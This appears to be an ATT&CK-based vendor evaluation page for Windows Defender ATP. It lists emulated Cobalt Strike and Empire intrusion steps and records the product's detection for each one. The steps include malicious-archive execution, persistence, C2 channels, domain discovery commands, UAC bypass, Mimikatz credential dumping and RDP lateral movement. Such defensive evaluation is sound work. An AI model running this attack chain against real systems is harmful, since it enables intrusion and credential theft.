Windows Defender ATP
Defender
Microsoft
Microsoft Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.
Legend

Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment

Detection Modifiers: Tainted, Delayed, Configuration Change
Step | Procedures | Technique | Detection Type | Detection Notes | Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
Telemetry
  
Telemetry showed the user execution sequence of Resume Viewer.exe with multiple files written and subsequently executed. Resume Viewer.exe was audited by Exploit Guard and the vendor stated that the audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Telemetry showing execution of Resume Viewer.exe from explorer.exe and dropping pdfhelper.cmd and autoupdate.bat
Telemetry showing write of pdfhelper.cmd
Telemetry showing write of autoupdate.bat
Telemetry showing execution of pdfhelper.cmd and update.dat
Telemetry showing execution of decoy PDF by MicrosoftPdfReader.exe
Telemetry showing Resume Viewer.exe binary and process metadata
Telemetry showing Resume Viewer.exe binary reputation
Exploit Guard audit of Resume Viewer.exe
Rundll32
(T1085)
Telemetry
  
Telemetry showed the execution sequence for rundll32.exe running update.dat.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for a low-reputation DLL loaded by a signed executable due to rundll32.exe execution of update.dat.
Telemetry showing rundll32.exe process injection sequence
General Behavior alert on low-reputation DLL load by signed executable
Scripting
(T1064)
Telemetry
  
Telemetry within a process tree showed the child cmd.exe process running the script pdfhelper.cmd.
Telemetry within the process tree showing the child cmd.exe process running the script pdfhelper.cmd
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed the execution sequence for Resume Viewer.exe writing autoupdate.bat to Debbie's Startup folder to establish persistence.
Telemetry showing write of autoupdate.bat to startup folder
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
None
  
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically).
Telemetry showing DNS requests to the C2 domain (custom query) (does not count as a detection)
Data Encoding
(T1132)
None
  
No detection capability demonstrated for this procedure.
Standard Application Layer Protocol
(T1071)
Telemetry (Configuration Change)
  
 
Telemetry showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The vendor stated that DNS telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events.
Telemetry showing DNS requests to the C2 domain (custom query)
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing ipconfig.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious.
Telemetry showing execution sequence for ipconfig.exe with command-line arguments
General Behavior alert on suspicious sequence of discovery techniques
Process tree view of General Behavior alert on suspicious sequence of discovery techniques
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing arp.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for arp.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing arp.exe
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing echo with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for echo with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing echo command
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing tasklist.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for tasklist.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing tasklist.exe
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing sc.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for sc.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing sc.exe
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing net.exe with command-line arguments
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running systeminfo.exe.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for systeminfo.exe
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing systeminfo.exe
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing net.exe with command-line arguments
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
Telemetry showing domain admins group discovery by Nimda at the domain controller
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
Telemetry showing discovery of George permissions by Debbie from Nimda at the domain controller
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe running reg.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for reg.exe with command-line arguments
Process tree view of General Behavior alert on suspicious sequence of discovery techniques (showing tainted reg.exe query command)
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent elevated powershell.exe process, indicating token manipulation (tainted by parent alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Telemetry showing svchost.exe execution with seclogon command-line argument then subsequent powershell.exe
Alert for 'Suspicious PowerShell command-line' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe as a medium integrity process as user Debbie and subsequent execution of powershell.exe as a high integrity process as SYSTEM as part of the UAC bypass (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Telemetry showing rundll32.exe running as medium integrity as user Debbie
Telemetry showing powershell.exe running as high integrity as SYSTEM
Alert for 'Suspicious PowerShell command-line' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Enrichment (Tainted)
  
 
The capability enriched data showing powershell.exe injecting into cmd.exe (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection. Process Injection attempt was audited by Exploit Guard. Vendor states that the Exploit Guard audit events demonstrate that execution would have been prevented if Export Address Table (EAF) was enabled in blocking mode.
Enrichment of powershell.exe injecting into cmd.exe
Alert for 'Suspicious PowerShell command-line' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe (subsequent powershell.exe is the injecting process)
Specific Behavior alert showing powershell.exe process injection
Telemetry showing process injection activity audited by Exploit Guard
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by association with the prior suspicious process injection alert linked to rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific net.exe command not shown)
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by association with the prior suspicious process injection alert linked to rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific net.exe command not shown)
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing netsh.exe with command-line arguments (tainted by association with the prior suspicious process injection alert linked to rundll32.exe).
Telemetry showing execution sequence for netsh.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific netsh.exe command not shown)
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing netstat.exe with command-line arguments (tainted by association with the prior suspicious process injection alert linked to rundll32.exe).
Telemetry showing execution sequence for netstat.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific netstat.exe command not shown)
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Enrichment (Tainted)
  
 
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated on credential memory access.
Enrichment showing Exploit Guard audit of svchost.exe extracting credentials from lsass.exe
Alert for suspicious process injection showing tainted association via a process tree containing svchost.exe (inner failure message in screenshot not relevant to tested functionality)
Specific Behavior alert description for sensitive credential memory read
Process tree for sensitive credential memory read alert
Process Injection
(T1055)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection into lsass.exe.
Telemetry showing svchost.exe accessing and extracting credentials from lsass.exe
Alert on credential dump showing injecting svchost.exe process (process with syringe) that was used to access lsass.exe
Specific Behavior alert for process injection into lsass.exe (inner failure message in screenshot not relevant to tested functionality)
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Enrichment (Tainted)
  
 
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled.
Enrichment showing Exploit Guard audit of svchost.exe extracting credentials from lsass.exe
Alert for process injection into lsass.exe tainting this event (inner failure message in screenshot not relevant to tested functionality)
Process Injection
(T1055)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection into lsass.exe. The alert was rolled up under the prior lsass.exe process injection alert and the last activity seen field was updated.
Telemetry showing svchost.exe accessing and extracting credentials from lsass.exe
Alert on prior credential dump tainting svchost.exe process (process with syringe indicating process injection) that was used to access lsass.exe
Specific Behavior alert for process injection into lsass.exe (inner failure message in screenshot not relevant to tested functionality)
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe as a high integrity process from SYSTEM and subsequent cmd.exe process running as user George (tainted by the parent alert on suspicious process injection into lsass.exe). Svchost.exe was executed with seclogon command-line argument indicating token manipulation.
Telemetry showing svchost.exe invocation with seclogon flag subsequently running cmd.exe as SYSTEM
Telemetry showing resulting cmd.exe running as user George
Alert for suspicious process injection showing tainted association via a process tree containing subsequent cmd.exe processes (inner failure message in screenshot not relevant to tested functionality)
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of reg.exe executing with command-line arguments. The telemetry was tainted by the relationship to prior rundll32.exe activity based on process injection alert context.
Telemetry showing execution sequence for reg.exe with command-line arguments
Process tree view of suspicious process injection alert on lsass.exe showing tainted relationship to reg.exe (inner failure message in screenshot not relevant to tested functionality)
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for rundll32.exe opening a connection to 192.186.0.4 (C2 server) over port 80. The telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe.
Telemetry showing execution sequence for rundll32.exe opening network connection
Incident graph from "Unexpected process behavior" alert (resulting from rundll32.exe) showing tainted network connection
Multiband Communication
(T1026)
Telemetry (Tainted)
  
 
Telemetry showed an execution sequence for rundll32.exe opening a connection to 192.168.0.4 (C2 server) over port 80, and prior activity showed DNS traffic to the same C2 IP address, which could indicate multiband communication. The port 80 telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. 
Telemetry showing execution sequence for rundll32.exe opening port 80 network connection
Incident graph from "Unexpected process behavior" alert (resulting from rundll32.exe) showing tainted network connection
Telemetry showing DNS traffic to C2 domain
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically).
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed the execution sequence for cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). Logon activity over the last 30 days on Conficker shows George with a logon type 10 RemoteInteractive logon event. Telemetry also showed George logged into Conficker and displayed a movement graph of activity from user account Debbie to George.
Telemetry showing execution sequence for cmd.exe connection over RDP to 10.0.0.5 (Conficker)
Telemetry showing execution sequence on 10.0.0.5 (Conficker) showing George logon
Telemetry showing user logon activity on 10.0.0.5 (Conficker) showing George with a logon type 10 RemoteInteractive logon event
Graph showing movement from Debbie account to George
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry (Configuration Change)
  
 
Telemetry showed data for the creation of account Jesse after a configuration change to enable collection of event ID 4720. Visibility of account creation data was verified in retesting at the end of the evaluation, after the vendor adjusted the data collection configuration.
Telemetry showing creation of user account Jesse
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe running lusrmgr.msc
Account Discovery
(T1087)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Telemetry showing mmc.exe running lusrmgr.msc
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed cmd.exe writing updater.dll to disk.
Telemetry showing file write of updater.dll
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on a low-reputation DLL persisting through a scheduled task.
Telemetry showing schtasks.exe with command-line arguments scheduling a task for persistence
Alert for low-reputation DLL persisting through rundll32.exe as a scheduled task
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for cmd.exe executing dir with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments.
Telemetry showing execution sequence of cmd.exe executing dir with command-line arguments
Process tree view of rundll32.exe "Unexpected behavior from process run with no command-line arguments" alert that tainted dir (dir command not shown)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for cmd.exe executing tree.com with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments.
Telemetry showing execution sequence of cmd.exe executing tree.com with command-line arguments
Process tree view of rundll32.exe "Unexpected behavior from process run with no command-line arguments" alert that tainted tree (tree command not shown)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
Telemetry (Configuration Change)
  
 
Telemetry showed events indicating "explorer.exe is reading user keystrokes." The vendor stated that Input Capture telemetry is captured but it was not immediately visible in the user portal. The vendor made changes to the portal during the test to enable the visibility of these events. Telemetry also showed cmd.exe injecting into explorer.exe to facilitate the keylogging, but this did not identify input capture specifically so was not counted as a detection.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on "Possible keylogging activity" against explorer.exe.
Telemetry showing explorer.exe reading user keystrokes
Execution sequence showing cmd.exe injecting into explorer.exe (does not count as a detection)
Specific Behavior alert for "Possible keylogging activity" against explorer.exe
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
Enrichment (Configuration Change)
  
 
The capability enriched an explorer.exe process with ScreenshotTaken. The vendor stated that screen capture telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events, so this detection is identified as a configuration change.
Enrichment of explorer.exe with ScreenshotTaken
Process Injection
(T1055)
Enrichment
  
The capability enriched the execution sequence for cmd.exe injecting into explorer.exe with the label "Inject to process."
Enrichment of execution sequence showing cmd.exe injecting into explorer.exe (labeled "Inject to process")
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure. The vendor stated that, by default, WDATP monitored activities around the most commonly used document types (doc, xls, ppt, pdf, etc.) at the time of the evaluation. Subsequently, the vendor made changes to enable the visibility of .vsdx events by default, which is now available in WDATP.
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure.
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing autoupdate.bat from the Startup folder to start update.dat.
Telemetry showing Startup folder execution sequence for autoupdate.bat on user logon
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule".
Telemetry showing execution sequence for svchost.exe parent of rundll32.exe process running with "-k netsvcs -p -s Schedule" arguments
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a successful connection to Conficker (10.0.0.5) over port 3389 from rundll32.exe.
Telemetry showing successful port 3389 connection to Conficker (10.0.0.5)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed the new local user account Jesse logging into Conficker.
Telemetry showing local user account Jesse first and last seen logons on Conficker
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Telemetry
  
Telemetry showed explorer.exe running autoupdate.vbs through wscript.exe and subsequent execution of PowerShell script and cmdlets.
Specific Behavior
  
A delayed Specific Behavior alert was generated for suspicious PowerShell command-line arguments.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for PowerShell script with suspicious content detected through Antimalware Scan Interface extracted content.
Specific Behavior
  
A Specific Behavior alert was generated for PowerShell script with malicious cmdlets related to Empire.
Telemetry showing execution of autoupdate.vbs script
Telemetry showing execution of wscript.exe
Telemetry showing execution of PowerShell cmdlets from wscript.exe
Telemetry showing PowerShell script metadata and decoded command-line arguments
Specific Behavior alert for "Suspicious PowerShell command-line"
Specific Behavior alert for "PowerShell script with suspicious content" detected through Antimalware Scan Interface extracted content
Specific Behavior alert for PowerShell script with malicious cmdlets
Process tree of alert showing malicious PowerShell cmdlets related to Empire
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over port 443 (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert also showed decoded command-line arguments containing port 443.
Telemetry showing powershell.exe communicating over TCP port 443
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server)
Telemetry within alert showing decoded command-line arguments containing port 443 and tainted relationship to the powershell.exe process
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain.
Indicator of Compromise (Configuration Change)
  
 
An Indicator of Compromise alert was generated on the C2 domain. The vendor added a detection for the evaluation's C2 domain using the product's standard customer-facing custom detection capability.
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server) over an encrypted channel
Telemetry within alert showing decoded command-line arguments containing HTTPS
Alert for C2 domain indicator of compromise 
Standard Cryptographic Protocol
(T1032)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain.
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server) over an encrypted channel
Telemetry within alert showing decoded command-line arguments containing HTTPS
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing route.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing ipconfig.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing whoami.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing qprocess.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a previous suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution sequence of powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process
General Behavior alert description for "Suspicious sequence of exploration activities"
Process tree view of "Suspicious sequence of exploration activities" alert context with net.exe command-line arguments
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence from PowerShell with several activities from the WinEnum cmdlet. The telemetry was tainted by the previous "Suspicious sequence of exploration activities" alert.
Specific Behavior
  
A Specific Behavior alert was generated for "A malicious PowerShell Cmdlet was invoked on the machine."
Telemetry showing powershell.exe execution sequence resulting from WinEnum
